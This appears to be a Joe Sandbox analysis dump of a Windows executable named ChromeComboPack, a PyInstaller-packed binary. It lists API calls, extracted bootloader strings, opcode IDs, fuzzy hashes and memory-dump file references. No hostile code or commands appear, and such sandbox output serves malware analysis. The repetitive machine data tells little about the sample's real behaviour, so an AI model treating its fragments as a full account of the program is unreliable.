                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                • Opcode ID: d85cd9fcf26276e168e517ee9abf5ede364ec1e9effdf9a011e7fffbe194a537
                                                                                                                                                                                                                                                • Instruction ID: 21a23946d1df5aa9e29f8153770376727d5202796b5cf90fe334d992216666f3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d85cd9fcf26276e168e517ee9abf5ede364ec1e9effdf9a011e7fffbe194a537
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F22B535909B87E2FA45BB64E84C1B4B3A4BF54B81FF450B5D60E21268EF3CB499D230
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                • Opcode ID: 3bd3e37efd012c8e2e3270f1ddacdcfc1e24b7bb52a0dbabcea0a7cbd221c97c
                                                                                                                                                                                                                                                • Instruction ID: a0332e32db3e1c780ad6c2322392ee4017f3b2af8427bcec43385b10dcf21e6c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3bd3e37efd012c8e2e3270f1ddacdcfc1e24b7bb52a0dbabcea0a7cbd221c97c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED02B36590DBD7E1FA08BB64E84D1B8E364BF44785BF450B5D60E26268EF3CB159C230
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9B88F0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF78C9B3A14,00000000,00007FF78C9B1965), ref: 00007FF78C9B8929
                                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF78C9B7B07,FFFFFFFF,00000000,?,00007FF78C9B3101), ref: 00007FF78C9B767C
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentExpandMultiStringsWide
                                                                                                                                                                                                                                                • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                • API String ID: 2001182103-930877121
                                                                                                                                                                                                                                                • Opcode ID: 8054c3c0650854d0b40b7a035891c415250060ac884c921d421b6e0c89ed4a50
                                                                                                                                                                                                                                                • Instruction ID: b7d5e2c2a5fcc5615e5233a09ac7be60c49c4497f90da12e83ee16dfa4dd2dd3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8054c3c0650854d0b40b7a035891c415250060ac884c921d421b6e0c89ed4a50
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3519811A2C6D2A1FB50FB25E8596BAE254FF84B80FF405B2D60E52699EE2CE504C770
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                • Opcode ID: 11bce47d0d0e64839e27bb7d3290e638deefce497560f6bcecbf4d4959fd4dcd
                                                                                                                                                                                                                                                • Instruction ID: c7327925318ccac773b4f751564d29fe5c01da71479465f966a3ae053590cfd8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11bce47d0d0e64839e27bb7d3290e638deefce497560f6bcecbf4d4959fd4dcd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6321B762B08AC292F745AB7AA54C179E354FF88B90FA842B0DF1D577D8DE2CD580C230
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                • Opcode ID: 65d4a0ffdc8e7253b8e60b637b85ac8f97459ea152ba9c8238927d2e88e0f15e
                                                                                                                                                                                                                                                • Instruction ID: 3d68c2ee3dd480a58317427b2c4f4b11e70315e480f568afe8d45d7584c41f02
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65d4a0ffdc8e7253b8e60b637b85ac8f97459ea152ba9c8238927d2e88e0f15e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D129162E0C2C386FB60BA15D19467AF691FB40770FE485B5E69946AC4DF3CE980CF24
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                • Opcode ID: fc8e2330ab6ced16bd3d959f6bc8057a9fc686b659d09149717256120edd57c1
                                                                                                                                                                                                                                                • Instruction ID: 4ac6524be11094067f98c5171844774f0318238b8074e7142575be27e666be14
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc8e2330ab6ced16bd3d959f6bc8057a9fc686b659d09149717256120edd57c1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8127031A0C2C386FB24BA15F0546BAE651FB50764FE491F5E689466C4DF3DE980DF20
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                • Opcode ID: 3de5569b17d39bd3f46907a13a7d7ea9780b6a91ae7827c5f4e177171ee66028
                                                                                                                                                                                                                                                • Instruction ID: afee4afd45c4bb230c0a922e699169ddd24b976368ca853698d32affaccd5da8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3de5569b17d39bd3f46907a13a7d7ea9780b6a91ae7827c5f4e177171ee66028
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0741A762B086E2A2FA00FB1198486B9E395FF55BD0FE444B2EE0C47796DE3CE545C760
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                • Opcode ID: b31a809ab639a0c898d80934825b16474b77a1d211bc9cd5a41603bf722a7190
                                                                                                                                                                                                                                                • Instruction ID: f469762754166e1bf8856401e35582eb4fb18aedb37d827dbc4bd593da324983
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b31a809ab639a0c898d80934825b16474b77a1d211bc9cd5a41603bf722a7190
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8641BE32A086E2A6EB00FF2195041B9E391FF44794FE444B2EE4D17B99EE7CE541C720
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: a729206dc09f3ae888f69fb8db1d25833570b00ee2d7cb806a54919031002ad3
                                                                                                                                                                                                                                                • Instruction ID: f9c5231023b5cac40c49dc20e9f21e0001c2f19612fc95c98aff4e0e6a968141
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a729206dc09f3ae888f69fb8db1d25833570b00ee2d7cb806a54919031002ad3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09D19332908BD196EB20EF69D4403ADB7A8FB45798FA00175EE8D57B9ACF38E441C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF78C9B2AC6,?,00007FF78C9B2BC5), ref: 00007FF78C9B2360
                                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF78C9B2AC6,?,00007FF78C9B2BC5), ref: 00007FF78C9B241A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentFormatMessageProcess
                                                                                                                                                                                                                                                • String ID: %ls$%ls: $<FormatMessageW failed.>$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                • API String ID: 27993502-4247535189
                                                                                                                                                                                                                                                • Opcode ID: 5c54806743b5fc5ca5748e300e790daf69093409d5698ed67d8ea85ca9e7f6b1
                                                                                                                                                                                                                                                • Instruction ID: f5e125ec28d0e59db15dae96a279897d2d6c12753ea9b1db40b541eb0b97e107
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c54806743b5fc5ca5748e300e790daf69093409d5698ed67d8ea85ca9e7f6b1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8931D363B08AD151E620BB25B8146FAE2A5FF84BD4FD00175EF4D97A99EE3CE106C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF78C9BD4AA,?,?,?,00007FF78C9BD19C,?,?,?,00007FF78C9BCD99), ref: 00007FF78C9BD27D
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF78C9BD4AA,?,?,?,00007FF78C9BD19C,?,?,?,00007FF78C9BCD99), ref: 00007FF78C9BD28B
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF78C9BD4AA,?,?,?,00007FF78C9BD19C,?,?,?,00007FF78C9BCD99), ref: 00007FF78C9BD2B5
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF78C9BD4AA,?,?,?,00007FF78C9BD19C,?,?,?,00007FF78C9BCD99), ref: 00007FF78C9BD323
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF78C9BD4AA,?,?,?,00007FF78C9BD19C,?,?,?,00007FF78C9BCD99), ref: 00007FF78C9BD32F
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                • Opcode ID: cfe7c3e8e36681254bad5299873ee692e307dc20b52bfdb0e9be079fe62a9b1d
                                                                                                                                                                                                                                                • Instruction ID: 622d381c40cfc2d34802bf14f60e164679f6c2e422b2b09b22700659f85de6eb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfe7c3e8e36681254bad5299873ee692e307dc20b52bfdb0e9be079fe62a9b1d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E31C722B0AAD1E1EE11BB42A804675A3D8FF49BA4FA90575DE1D47748EF3CE445C334
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                • Opcode ID: ca2a0e392c9de3b72f8d52546651bfdb069a4b33f03e78a7c3c6d8cc65986557
                                                                                                                                                                                                                                                • Instruction ID: 5236cd7c040407006707cdc3c3b6c6a6e0e735999b56febe53c046c0abf67cc1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca2a0e392c9de3b72f8d52546651bfdb069a4b33f03e78a7c3c6d8cc65986557
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87419131A19AD7B1EA20FB20E4481E9B315FF54380FE001B2EA5D5369AEF3CE605C760
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: 5fc9f1533f817a3b36bf126c798386ef815c87bc6caab6884f62d1feea17f363
                                                                                                                                                                                                                                                • Instruction ID: 1c2c257b817354feb2f037b54b21bbfadca2d1f19a949f41e613540c98064fe3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fc9f1533f817a3b36bf126c798386ef815c87bc6caab6884f62d1feea17f363
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F217F24F0D2C282FE54B721A649139E256BF847B0FF417F4DA3E166DADE2CA501CB20
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
